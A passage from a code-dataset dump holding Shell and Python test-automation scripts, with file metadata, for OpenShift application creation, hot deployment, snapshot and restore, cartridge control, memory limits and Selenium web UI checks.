webdriver.Firefox()\ndriver2 = webdriver.Firefox()\n\ndriver1.get('http://www.baidu.com')\n\ndriver2.get('http://www.google.com')\n" }, { "alpha_fraction": 0.5885341167449951, "alphanum_fraction": 0.6044992804527283, "avg_line_length": 28.319149017333984, "blob_id": "c31343dfdda9ac238be6f0f334563bbc7b6eb45c", "content_id": "388c90cc2b8dcb91d961406c06004f2c9465f5c7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1378, "license_type": "no_license", "max_line_length": 83, "num_lines": 47, "path": "/automation/open/Longevity/longevity.sh", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/bin/bash\napp_type=$1\npwd=$(pwd)\ntime=$(date +%Y%m%d-%H%M%S)\nlog=\"$pwd/${0%.*}_${time}.log\"\n\n#no parameter\napp_create_all()\n{\n\tfor scale in on off;do\n\t\tfor app in $app_types;do\n\t\t\tif [ \"$app\" = \"diy-0.1\" ] && [ \"$scale\" = \"on\" ];then\n\t\t\t\techo \"Diy is cann't support scalable !\"\n\t\t\t\tcontinue\n\t\t\tfi\n\t\t\tfor cartridge_type in $cartridges;do\n\t\t\t\tif [ \"$scale\" = \"on\" ] && [ \"$cartridge_type\" = \"cron-1.4\" ];then\n\t\t\t\t\techo \"Cron-1.4 is can not embedded to scalable application!\"\n\t\t\t\telif [ \"$app\" = \"jbosseap-6.0\" ] && [ \"$cartridge_type\" = \"cron-1.4\" ];then\n\t\t\t\t\techo \"Cron-1.4 is not support at jbosseap-6.0\"\n\t\t\t\telif [ \"$scale\" = \"off\" ];then\n\t\t\t\t\trun app_create $app\n\t\t\t\t\trun url_check $app_name\n\t\t\t\t\trun cartridge_add $cartridge_type $app_name\n\t\t\t\t\trun url_check $app_name\n\t\t\t\t\techo \"$app_name\t\t$cartridge_type\t\t\tnoscalable\t\t$(date +%Y%m%d-%H%M%S)\" >> $log\n\t\t\t\telse\n\t\t\t\t\trun app_create $app -s\n\t\t\t\t\trun cartridge_add $cartridge_type $app\n\t\t\t\t\techo \"$app_name\t\t$cartridge_type\t\t\tscalable\t\t\t$(date +%Y%m%d-%H%M%S)\" >> 
$log\n\t\t\t\tfi\n\t\t\tdone\n\t\tdone\n\tdone\n\techo_yellow \"Already have $(($app_number+1)) applications\"\n}\n\n. ./function.sh\nrun set_running_parameter\nwhile true;do\n\t[ -d testdir ] && rm -rf testdir/* || mkdir testdir\n\tcd testdir\n\trhc domain show -predhat|grep jenkins-1.4 > /dev/null\n\t[ $? -ne 0 ] && run app_create jenkins-1.4\n\trun app_create_all\n\trun app_delete_all\ndone\n" }, { "alpha_fraction": 0.692556619644165, "alphanum_fraction": 0.6957928538322449, "avg_line_length": 31.526315689086914, "blob_id": "14145bd659e9029059fac5fecf54f5e463d6c899", "content_id": "987a06b73709a47c557712f967d84328815ec043", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 618, "license_type": "no_license", "max_line_length": 121, "num_lines": 19, "path": "/automation/open/Longevity/hot_deploy.sh", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/bin/bash\n. ./function.sh\napp_name=$1\n\nrun add_hot_deploy $app_name\nrun app_service_pid $app_name\npids_before_push=$pids\n#git push\nrun app_modify_and_push $app_name\nrun url_check $app_name \"${app_name}-Welcome to OpenShift\"\nrun app_service_pid $app_name\npids_after_push=$pids\necho_bold \"pids_before_push = $pids_before_push\"\necho_bold \"pids_after_push = $pids_after_push\"\nfor pid in $pids_before_push;do\n    echo \"$pids_after_push\" | grep $pid >/dev/null\n    [ $? -eq 0 ] && echo_bold \"$pid still exists!\" || { echo_red \"$pid can't be found after push, please check!\"; break; }\ndone\necho_green \"hot_deploy succeeded!\"\n" }, { "alpha_fraction": 0.5876638293266296, "alphanum_fraction": 0.5903750658035278, "avg_line_length": 40.74528121948242, "blob_id": "c7f150633d0b99fb453e2e11cfd90331d2930b53", "content_id": "6d399ec1d47a8b1c04f08d6cfede0622e6f0a5d5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4426, "license_type": "no_license", "max_line_length": 144, "num_lines": 106, "path": "/automation/open/testmodules/UI/web/case_138635.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_138635.py\n# Date: 2012/07/17 11:23\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n    def initialize(self):\n        pass\n\n    def finalize(self):\n        pass\n\n\nclass CheckAppsListPage(OpenShiftTest):\n    def test_method(self):\n        web = self.config.web\n\n        \n        #check with invalid password\n        #web.go_to_home()\n        #web.go_to_signin()\n        #web.input_by_id(\"web_user_rhlogin\", \"[email protected]\")\n        #web.input_by_id(\"web_user_password\", \"redhat\")\n        #web.click_element_by_xpath(\"//input[@id='web_user_submit']\")\n        web.login()\n\n        #web.delete_app(\"python\")\n        #create a python app\n        web.create_app(\"python-2.6\",\"python\")\n\n\n        #check whether the links are correct\n        #time.sleep(20)\n        #go to the app list page\n        web.go_to_app_detail(\"\")\n\n        #check the \"app overview\" link\n        web.click_element_by_xpath('''//section[@id='app-list']/div/div/div/h2/a''')\n        time.sleep(2)\n        web.assert_text_equal_by_xpath('''PYTHON''','''/html/body/div/div/div/div/div/div/nav/ul/li[2]/a''')\n        web.go_back()\n        #check the \"appurl\" link\n        web.click_element_by_xpath('''//section[@id='app-list']/div/div/div/div/a''')\n        time.sleep(2)\n        web.assert_text_equal_by_xpath('''Welcome To OpenShift''','''//body/h1''')\n        web.go_back()\n        #check the \" Add Application\" link\n        web.click_element_by_xpath('''//section[@id='app-list']/div[2]/a/strong''')\n        
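        # Editor's note: the fixed time.sleep(2) pauses throughout this suite
        # are a known source of flakiness; an explicit wait is the usual fix.
        # Illustrative sketch only (this suite drives the browser through the
        # 'web' wrapper, whose underlying 'driver' attribute is used in
        # tearDown below):
        #   from selenium.webdriver.support.ui import WebDriverWait
        #   WebDriverWait(web.driver, 10).until(
        #       lambda d: d.find_element_by_xpath("//div[@id='content']"))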
time.sleep(2)\n #web.assert_text_equal_by_xpath('''Create a New Application''','''//div[@id='content']/div/div/div/div[2]/div/h1''')\n web.go_back()\n #check the \"Developer Center\" link\n web.click_element_by_xpath('''//div[@id='assistance']/ul/li/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Developer Center''','''//div[@id='content']/div/div/div/div[3]/div/h1/div''')\n web.go_back()\n #check the \"OpenShift User Guide\" link\n web.click_element_by_xpath('''//div[@id='assistance']/ul/li[2]/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('''OpenShift''','''//div[@id='id2789633']/div/div/div/span''')\n web.go_back()\n\n #check the \"Installing OpenShift client tools on Mac OSX, Linux, and Windows\" link\n web.click_element_by_xpath('''//div[@id='assistance']/ul/li[3]/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Get Started with OpenShift''','''//div[@id='content']/div/div/div//div/div/h1''')\n web.go_back()\n #check the \"Sync your OpenShift repo with an existing Git repo\" link\n web.click_element_by_xpath('''//div[@id='assistance']/ul/li[4]/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Knowledge Base''','''//div[@id='content']/div/div/div/div[3]/div/h1/div''')\n web.go_back()\n #check the \"More help »\" link\n web.click_element_by_xpath('''//div[@id='assistance']/ul/li[5]/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Create''','''//div[@id='content']/div/div/div/div[2]/div/section/div/h2''')\n web.go_back()\n #check the \"How do I start a new Forum discussion?\" link\n web.click_element_by_xpath('''//div[@id='assistance']/ul[2]/li/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('''How do I start a new Forum discussion?''','''//div[@id='content']/div/div/div/div[3]/div/section/div[2]/h2''')\n web.go_back()\n #check the \"How do I install the rhc client tools on Windows?\" link\n web.click_element_by_xpath('''//div[@id='assistance']/ul[2]/li[2]/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('''How do I install the rhc client tools on Windows?''','''//div[@id='content']/div/div/div/div[3]/div/section/div[2]/h2''')\n web.go_back()\n #check the \"More FAQs »\" link\n web.click_element_by_xpath('''//div[@id='assistance']/ul[2]/li[3]/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Frequently Asked Questions''','''//div[@id='content']/div/div/div/div[3]/div/h1/div''')\n \n #delete a python app\n web.delete_app(\"python\")\n\n\n self.tearDown()\n\n return self.passed(\" case_138635--CheckAppsListPage passed successfully.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(CheckAppsListPage)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of case_138635.py\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.7354430556297302, "alphanum_fraction": 0.7481012940406799, "avg_line_length": 27.214284896850586, "blob_id": "2440c6da9e20cbea9eb88c3ed2203c3dbc843f0d", "content_id": "900301a1a375f6bc5d1ee40e6418896f0b24ce7d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 790, "license_type": "no_license", "max_line_length": 109, "num_lines": 28, "path": "/automation/open/testmodules/RT/hot_deploy/jbosseap_exploded_wars_without_jenkins.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": 
"#!/usr/bin/python\n\n\"\"\"\nAttila Nagy\nNov 7, 2012\n\n\"\"\"\nimport rhtest\nimport common\nfrom jbossas_exploded_wars_without_jenkins import JBossHotDeployExplodedWarsWithoutJenkins\n\nclass EAPHotDeployExplodedWarsWithoutJenkins(JBossHotDeployExplodedWarsWithoutJenkins):\n def __init__(self, config):\n JBossHotDeployExplodedWarsWithoutJenkins.__init__(self, config)\n self.config.application_type = common.app_types['jbosseap']\n self.config.summary = \"[US2443] Hot deployment support for Jboss-Eap6 application with exploded wars\"\n \nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(EAPHotDeployExplodedWarsWithoutJenkins)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5876638293266296, "alphanum_fraction": 0.5903750658035278, "avg_line_length": 40.74528121948242, "blob_id": "c7f150633d0b99fb453e2e11cfd90331d2930b53", "content_id": "6d399ec1d47a8b1c04f08d6cfede0622e6f0a5d5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4426, "license_type": "no_license", "max_line_length": 144, "num_lines": 106, "path": "/automation/open/testmodules/RT/node/app_limit_per_user_normal_creation.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "import os\nimport sys\nimport string\nimport rhtest\nimport common\n\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.summary= \"Application limit per user validation on single/multiple node\"\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n self.app_type = common.app_types[\"php\"]\n self.app_name_prefix = common.getRandomString(5)\n try:\n #self.app_limit_per_user = string.atoi(os.environ[\"OPENSHIFT_app_limit_per_user\"])\n self.app_limit_per_user = self.config.tcms_arguments['app_limit']\n if self.app_limit_per_user == 'auto':\n self.info(\"Found AUTO -> getting max_gears via REST API\")\n self.app_limit_per_user = common.get_max_gears()\n except:\n import traceback\n traceback.print_exc(file=sys.stderr)\n try:\n self.app_limit_per_user = common.get_max_gears()\n # $OPENSHIFT_app_limit_per_user is obsolete\n self.info(\"Missing tcms_arguments['app_limit'] in config. 
Used %s as default (obtained from REST API).\"%self.app_limit_per_user)\n except Exception as e:\n import traceback\n traceback.print_exc(file=sys.stderr)\n self.abort(\"Unable to get max_gears per this user: %s\"%str(e))\n #self.app_limit_per_user = common.MAX_GEARS\n\n self.info(\"Testing limit for user: %s\"%self.app_limit_per_user)\n self.app_name = \"%s%s\" %(self.app_name_prefix, self.app_limit_per_user + 1)\n self.info(self.summary)\n # we need to be sure, that there are no other apps per this account\n common.env_setup() \n\n def finalize(self):\n if self.get_run_mode() == \"DEV\":\n ret = common.set_max_gears(self.user_email, common.DEV_MAX_GEARS)\n if ret != 0:\n self.info(\"Failed to set max gears back to %d\" % (common.DEV_MAX_GEARS))\n else:\n self.info(\"Successfully set max gears back to %d\" % (common.DEV_MAX_GEARS))\n os.system(\"rm -rf *%s\" %self.app_name_prefix)\n for i in range(0, self.app_limit_per_user):\n app_name = \"%s%s\" %(self.app_name_prefix, i)\n try:\n common.destroy_app(app_name, self.user_email, self.user_passwd)\n except:\n pass\n\nclass AppLimitPerUserNormalCreation(OpenShiftTest):\n\n def create_apps_one_by_one(self, start, end):\n for i in range(start, end):\n app_name = \"%s%s\" %(self.app_name_prefix, i)\n self.info(\"Creating app#%d\"%i)\n ret = common.create_app(app_name, self.app_type, self.user_email, self.user_passwd, False)\n self.assert_equal(0, ret, \"App #%d must be created successfully\"%i)\n return 0\n\n def test_method(self):\n if self.get_run_mode() == 'DEV':\n self.add_step(\"Set max gear to %d\" % (self.app_limit_per_user),\n common.set_max_gears,\n function_parameters = [self.user_email, self.app_limit_per_user],\n expect_return = 0,\n expect_description = \"Max gear should be set successfully\")\n\n self.add_step(\"Create %s apps one by one according to app_limit_per_user setting\" %(self.app_limit_per_user),\n self.create_apps_one_by_one,\n function_parameters = [0, self.app_limit_per_user],\n expect_return = 0,\n expect_description = \"Apps should be created successfully\")\n\n self.add_step(\"Try to create one more app to validate app_limit_per_user\",\n \"rhc app create %s %s -l %s -p '%s' %s\" \n %(self.app_name, self.app_type, self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_return='!0',\n expect_str=[\"already reached the gear limit of\"],\n expect_description=\"No more app should be created\")\n\n self.run_steps()\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(AppLimitPerUserNormalCreation)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.49416136741638184, "alphanum_fraction": 0.502653956413269, "avg_line_length": 41.33707809448242, "blob_id": "ec3f0ec2b8d839fd041f1197184241152b3a0378", "content_id": "166b2b2b3154a0c5af4681ab1b17675c6e51edde", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7536, "license_type": "no_license", "max_line_length": 104, "num_lines": 178, "path": "/automation/open/testmodules/RT/client/snapshot_restore_data_dir_to_new_app.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os\nimport common, OSConf\nimport rhtest\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\n\n\nclass OpenShiftTest(rhtest.Test):\n 
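    # Editor's note: initialize() below maps each cartridge variant to the
    # template file it deploys and to the three URL actions the test drives
    # (create data under OPENSHIFT_DATA_DIR, modify it, show it). The
    # snapshot/restore cycle then checks that data written outside the git
    # repo survives destroying and re-creating the application.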
INTERACTIVE = False\n\n def initialize(self):\n self.info((\"[US566][rhc-client] Archive an existing app \"\n \"and restore data to new created application\"))\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n try:\n self.test_variant = self.get_variant()\n except:\n self.info(\"Missing variant, using `php` as default.\")\n self.test_variant = \"jbossews\"\n\n self.info(\"VARIANT: %s\"%self.test_variant)\n self.app_type = common.app_types[self.test_variant]\n self.app_name = common.getRandomString(10)\n if self.test_variant == \"perl\":\n file_name = \"index.pl\"\n source_file = \"%s/data/snapshot_restore_data_dir/%s\" %(WORK_DIR, file_name)\n target_file = \"%s/perl/index.pl\" %(self.app_name)\n url_path1 = \"index.pl?action=create\"\n url_path2 = \"index.pl?action=modify\"\n url_path3 = \"index.pl\"\n elif self.test_variant in (\"php\", \"zend\"):\n file_name = \"index.php\"\n source_file = \"%s/data/snapshot_restore_data_dir/%s\" %(WORK_DIR, file_name)\n target_file = \"%s/php/index.php\" %(self.app_name)\n url_path1 = \"index.php?action=create\"\n url_path2 = \"index.php?action=modify\"\n url_path3 = \"index.php\"\n elif self.test_variant in (\"rack\", \"ruby\", \"ruby-1.9\"):\n file_name = \"rack/*\"\n source_file = \"%s/data/snapshot_restore_data_dir/%s\" %(WORK_DIR, file_name)\n target_file = \"%s/\" %(self.app_name)\n url_path1 = \"create\"\n url_path2 = \"modify\"\n url_path3 = \"show\"\n elif self.test_variant in (\"wsgi\", \"python\"):\n file_name = \"application.py\"\n source_file = \"%s/data/snapshot_restore_data_dir/%s\" %(WORK_DIR, file_name)\n target_file = \"%s/wsgi/application\" %(self.app_name)\n url_path1 = \"create\"\n url_path2 = \"modify\"\n url_path3 = \"show\"\n elif self.test_variant in (\"python-2.7\"):\n file_name = \"applicationpython-2.7.py\"\n source_file = \"%s/data/snapshot_restore_data_dir/%s\" %(WORK_DIR, file_name)\n target_file = \"%s/wsgi/application\" %(self.app_name)\n url_path1 = \"create\"\n url_path2 = \"modify\"\n url_path3 = \"show\"\n elif self.test_variant in (\"python-3.3\"):\n file_name = \"applicationpython-3.3.py\"\n source_file = \"%s/data/snapshot_restore_data_dir/%s\" %(WORK_DIR, file_name)\n target_file = \"%s/wsgi/application\" %(self.app_name) \n url_path1 = \"create\"\n url_path2 = \"modify\"\n url_path3 = \"show\"\n elif self.test_variant in (\"jbossas\", \"jbosseap\", \"jbossews\", \"jbossews2\"):\n file_name = \"test.jsp\"\n source_file = \"%s/data/snapshot_restore_data_dir/%s\" %(WORK_DIR, file_name)\n target_file = \"%s/src/main/webapp/%s\" %(self.app_name, file_name)\n url_path1 = \"%s?action=create\" %(file_name)\n url_path2 = \"%s?action=modify\" %(file_name)\n url_path3 = \"%s\" %(file_name)\n else:\n raise rhtest.TestIncompleteError(\"Unknown variant: %s.\"%self.test_variant)\n\n self.file_name = file_name\n self.target_file = target_file\n self.source_file = source_file\n self.url_path1 = url_path1\n self.url_path2 = url_path2\n self.url_path3 = url_path3\n common.env_setup()\n\n def finalize(self):\n pass\n\n\nclass SnapshotRestoreDataDirToNewApp(OpenShiftTest):\n def test_method(self):\n self.add_step(\"Create a %s application\" %(self.app_type),\n common.create_app,\n function_parameters=[self.app_name, self.app_type, \n self.user_email, self.user_passwd],\n expect_return=0,\n expect_description=\"App should be created successfully\")\n\n self.add_step(\"Copying test files to app git repo\",\n \"cp -f %s %s\" %(self.source_file, self.target_file),\n 
expect_return=0)\n\n self.add_step(\"Do git commit\",\n \"cd %s && git add . && git commit -m test && git push\" %(self.app_name),\n expect_return=0,\n expect_description=\"File and directories are added to your git repo successfully\")\n\n self.add_step(\"Access app's URL to create files in OPENSHIFT_DATA_DIR directory\",\n self.verify,\n function_parameters = [self.url_path1, \n [\"Welcome\", \"RESULT=0\"]],\n expect_return=0,\n try_interval=12,\n try_count=10)\n\n self.add_step(\"Take snapshot\",\n \"rhc snapshot save %s -f %s -l %s -p '%s' %s\" %(\n self.app_name,\n \"%s.tar.gz\"%(self.app_name),\n self.user_email, \n self.user_passwd,\n common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_return=0)\n\n self.add_step(\"Destroy app\",\n common.destroy_app,\n function_parameters=[self.app_name, \n self.user_email, \n self.user_passwd, \n True],\n expect_return=0)\n\n self.add_step(\"Re-create this application\",\n common.create_app,\n function_parameters=[self.app_name, \n self.app_type, \n self.user_email, \n self.user_passwd],\n expect_return=0,\n expect_description=\"App should be created successfully\")\n\n self.add_step(\"Restore app from snapshot\",\n \"rhc snapshot restore %s -f %s -l %s -p '%s' %s\" %(\n self.app_name,\n \"%s.tar.gz\"%(self.app_name),\n self.user_email, \n self.user_passwd,\n common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_return=0)\n\n self.add_step(\"Access app's URL to check OPENSHIFT_DATA_DIR dir is restored\",\n self.verify,\n function_parameters=[self.url_path3, \n [\"Welcome\", \"snapshot_restore_data_dir_test1\"]],\n expect_return=0,\n try_interval=12,\n try_count=10)\n\n self.run_steps()\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n\n def verify(self, suffix, str_l):\n url=OSConf.get_app_url(self.app_name)\n return common.grep_web_page(\"%s/%s\"%(url,suffix), str_l )\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(SnapshotRestoreDataDirToNewApp)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5516587495803833, "alphanum_fraction": 0.5579778552055359, "avg_line_length": 30.969696044921875, "blob_id": "0185841b4d1e9a600a2a63015168969258b32739", "content_id": "30ae175b11e4cda38d30d380a1ed6ff1563b8d1b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3165, "license_type": "no_license", "max_line_length": 134, "num_lines": 99, "path": "/automation/open/testmodules/RT/cartridge/jbosseap_non_scaling.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n\"\"\"\nAttila Nagy\[email protected]\nAug 1, 2012\n\"\"\"\n\nimport rhtest\nimport common\n\n\nclass JBossEAP(rhtest.Test):\n def log_info(self, message):\n self.info('=' * 80)\n self.info(message)\n self.info('=' * 80)\n\n def initialize(self):\n self.application_name = common.getRandomString()\n self.summary = '[US2307][RT] Create and Control on-scalingJbossEAP6 App'\n\n\n def finalize(self):\n pass\n\n\n def mysql_status(self):\n cmd = (\"rhc cartridge status -a %s -c %s \"\n \" -l %s -p '%s' %s\") % (self.application_name, \n common.cartridge_types['mysql'], \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd,\n common.RHTEST_RHC_CLIENT_OPTIONS)\n return common.command_getstatusoutput(cmd)\n\n\n def test_method(self):\n # Creation\n self.log_info('Creating application')\n common.create_app(\n self.application_name,\n 
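            # the remaining positional arguments follow common.create_app's usage throughout this suite: cartridge type, then the user login and password.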
common.app_types['jbosseap'],\n self.config.OPENSHIFT_user_email,\n self.config.OPENSHIFT_user_passwd)\n self.assert_equal(common.check_web_page_output(self.application_name), 0)\n\n # Deployment\n self.log_info('Modifying git repo')\n random_value = common.getRandomString()\n jsp_file = open(self.application_name + '/src/main/webapp/test.jsp', 'w')\n jsp_file.write(random_value)\n jsp_file.close()\n\n configuration_steps = [\n 'cd %s' % self.application_name,\n 'git add .',\n 'git commit -a -m testing',\n 'git push'\n ]\n self.assert_equal(common.command_get_status(' && '.join(configuration_steps)), 0)\n self.assert_equal(common.check_web_page_output(self.application_name, \n 'test.jsp', \n random_value), 0)\n\n # Add MySQL\n self.log_info('Adding MySQL')\n common.embed(self.application_name, 'add-' + common.cartridge_types['mysql'])\n ( ret_code, ret_output ) = self.mysql_status()\n self.assert_true(ret_output.find('MySQL is running') != -1)\n\n # Remove MySQL\n self.log_info('Removing MySQL')\n common.embed(self.application_name, \n 'remove-' + common.cartridge_types['mysql'])\n ( ret_code, ret_output ) = self.mysql_status()\n self.assert_true(ret_output.find(\"%s\" % (common.cartridge_types['mysql'])) != -1, \"Failed to find given string in the output\")\n\n # Remove the app\n self.log_info('Removing the app')\n ret_code = common.destroy_app(self.application_name)\n self.assert_equal(ret_code, 0)\n\n # Everythin is OK\n return self.passed(self.summary)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(JBossEAP)\n #### user can add multiple sub tests here.\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6108978986740112, "alphanum_fraction": 0.6385264992713928, "avg_line_length": 21.842105865478516, "blob_id": "0b46bbaf0c583fda77bb7cf10bf080c35d9e28d7", "content_id": "a5c179d254332290399bea8a5a94703c5bfb91b3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1303, "license_type": "no_license", "max_line_length": 96, "num_lines": 57, "path": "/automation/open/testmodules/UI/web/case_145613.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_145613.py\n# Date: 2012/07/17 11:23\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\n\nclass CheckHeaderTabs(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n\n web.go_to_home()\n\n web.assert_text_equal_by_xpath(\"LEARN MORE\",\"//nav[@id='nav']/div/div/ul/li/a/span\")\n web.assert_text_equal_by_xpath(\"GET STARTED\",\"//nav[@id='nav']/div/div/ul/li[2]/a/span\")\n web.assert_text_equal_by_xpath(\"DEVELOPERS\",\"//nav[@id='nav']/div/div/ul/li[4]/a/span\")\n web.assert_text_equal_by_xpath(\"COMMUNITY\",\"//nav[@id='nav']/div/div/ul/li[5]/a/span\")\n\n\n self.tearDown()\n\n return self.passed(\" case_145613--CheckHeaderTabs passed successfully.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(CheckHeaderTabs)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of case_145613.py\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: 
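# Several tests in this dump (for example the snapshot_restore steps above with
# try_interval=12 / try_count=10, and memory_swap's grep_web_page calls) poll an
# app URL until expected strings appear. A minimal sketch of that pattern
# follows; the helper name, the urllib2 usage and the delay/count defaults are
# illustrative assumptions, not the suite's actual common.grep_web_page code.
import time
import urllib2

def poll_page_for_text(url, expected, delay=5, count=10):
    # Retry until every expected string appears in the page body;
    # return 0 on success, 1 once all attempts are exhausted.
    for _ in range(count):
        try:
            body = urllib2.urlopen(url).read()
            if all(text in body for text in expected):
                return 0
        except urllib2.URLError:
            pass  # the app may still be deploying; retry after the delay
        time.sleep(delay)
    return 1

# e.g. poll_page_for_text("http://myapp.example.com/test.jsp", ["PASS"])
# mirrors the try_interval/try_count steps used by the snapshot tests.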
\n" }, { "alpha_fraction": 0.49509313702583313, "alphanum_fraction": 0.5059082508087158, "avg_line_length": 33.91608428955078, "blob_id": "80baf49ed370d8742ff8f56fef39fa1d6fcebea9", "content_id": "b1686e96850d6ee137e0965473258a7b2ce77a78", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4993, "license_type": "no_license", "max_line_length": 135, "num_lines": 143, "path": "/automation/open/testmodules/RT/limits/memory_swap.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nimport os\nimport common\nimport OSConf\nimport rhtest\nimport proc\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n ITEST = [\"DEV\"]\n\n def initialize(self):\n self.exp_file='rhc_tail-%s.expect'%common.getRandomString(5)\n self.app_name = common.getRandomString(10)\n self.app_type = 'php'\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n\n common.env_setup()\n self.steps_list = []\n\n def finalize(self):\n os.system(\"rm -rf %s %s\"%(self.app_name, self.exp_file))\n try:\n self.proc.kill()\n except:\n pass\n\n\nclass MemorySwap(OpenShiftTest):\n def change_mem_limit(self):\n res_limit_file = \"/var/lib/openshift/%s/%s/configuration/etc/php.ini\"%(OSConf.get_app_uuid(self.app_name), self.app_type)\n #res_limit_file = \"/var/lib/openshift/%s/%s/configuration/etc/conf/php.ini\"%(OSConf.get_app_uuid(self.app_name), self.app_type)\n command = \"sed -i -e 's/^memory_limit=.*/memory_limit=1280M/' %s\"%res_limit_file\n (status, output) = common.run_remote_cmd(self.app_name, command, as_root=True)\n #(status, output) = common.run_remote_cmd(None, command, as_root=True)\n return status\n\n def create_proc(self, cmd):\n fw = open(self.exp_file, 'wb')\n fw.write('''spawn -nottyinit %s\nset timeout -1\nexpect wait_for_ever_and_ever'''%cmd)\n fw.close()\n cmd2 = ['/usr/bin/expect', self.exp_file]\n self.proc = proc.Proc(cmd2,\n shell=False, \n stdin=open(os.devnull, 'rb'))\n\n def verify(self, size, oom_check=False):\n if (oom_check==True):\n self.debug(\"Run rhc tail as monitor into background...\")\n self.create_proc('/usr/bin/rhc tail %s -o \"-n 20\" -p %s -l %s %s'%(self.app_name, \n self.user_passwd, \n self.user_email,\n common.RHTEST_RHC_CLIENT_OPTIONS))\n\n url = OSConf.get_app_url(self.app_name)\n status = common.grep_web_page(\"%s/test.php?size=%s\"%(url,size), 'PASS', delay=2, count=6)\n \n if (oom_check==True):\n ret = self.proc.grep_output(\"PHP Fatal error:\\s+Allowed memory size of\", 3, 10)\n self.proc.kill()\n if ret==0:\n return 2\n else:\n self.error(\"There was no OOM found in %s application.\"%self.app_name)\n return 3\n\n return status\n\n def test_method(self):\n self.add_step(\"Create a PHP app\",\n common.create_app,\n function_parameters=[self.app_name, \n common.app_types[self.app_type], \n self.user_email, \n self.user_passwd, \n True],\n expect_return=0)\n\n self.add_step(\"Change memory_limit\",\n self.change_mem_limit,\n expect_return=0)\n\n self.add_step(\"Restart the 